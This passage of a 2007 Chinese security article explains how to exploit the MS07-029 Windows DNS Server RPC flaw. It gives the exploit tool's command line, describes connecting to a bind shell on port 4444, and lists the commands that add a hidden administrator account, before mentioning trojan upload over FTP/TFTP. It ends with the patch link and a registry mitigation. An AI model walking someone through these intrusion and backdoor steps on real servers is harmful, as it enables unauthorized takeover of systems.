作者:佚名
来源:本站原创
热度:
2007-5-30 16:54:57
在该漏洞的利用程序中执行命令:dns.exe -h 127.0.0.1 -t 1 -p 445,因为我是在本地计算机上进行测试的,所以其中的IP地址为127.0.0.1,而且需要根据服务器版的语言设置参数。当利用工具提示溢出成功以后,就可以利用telnet命令或程序nc连接存在漏洞的服务器中的4444端口,比如telnet 127.0.0.1 4444(图2)。需要说明的是,该工具的成功率并不是特别的高,所以在测试的时候需要多进行几次
当我们成功利用漏洞进行溢出以后,就可以在命令行输入:net user pcw 1234 /add,回车确定后如果显示命令成功,就说明已经成功的添加了一个用户名为pcw密码为1234的用户。
然后我们再在命令行输入:net localgroup administrators pcw /add,成功执行的话就表示将该用户已经添加到管理员组(图3)。
现在只要利用Windows系统自带的远程桌面功能,接着连接到该DNS服务器的IP地址,然后利用我们刚刚创建的用户名进行登录,就可以进行适时地远程管理操作了(图4)。
如果远程服务器没有开通终端服务功能,也可以通过溢出得到的命令提示符窗口,通过FTP或Tftp命令上传我们的木马程序,这样也可以进行有效的远程管理操作。
漏洞危害大,不可不防
由于这个安全漏洞影响到Windows 2000 Server和Windows Server 2003服务器软件,而且每一种语言版本的Windows服务器都要有一个补丁。微软提供的补丁地址:http: //www.microsoft.com/china/technet/security/bulletin/ms07-029.mspx,请根据自己情况选择对应的补丁。
同时,建议管理员采取如下措施以降低威胁。首先打开注册表编辑器,找到以下注册表位置HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Services\DNS\Parameters,通过右键菜单新建一个名为“RpcProtocol”的 DWORD项目,然后双击新建的值并将该值的数据更改为4,最后重启DNS服务更改生效即可。
我来说两句:
推荐文章
相关文章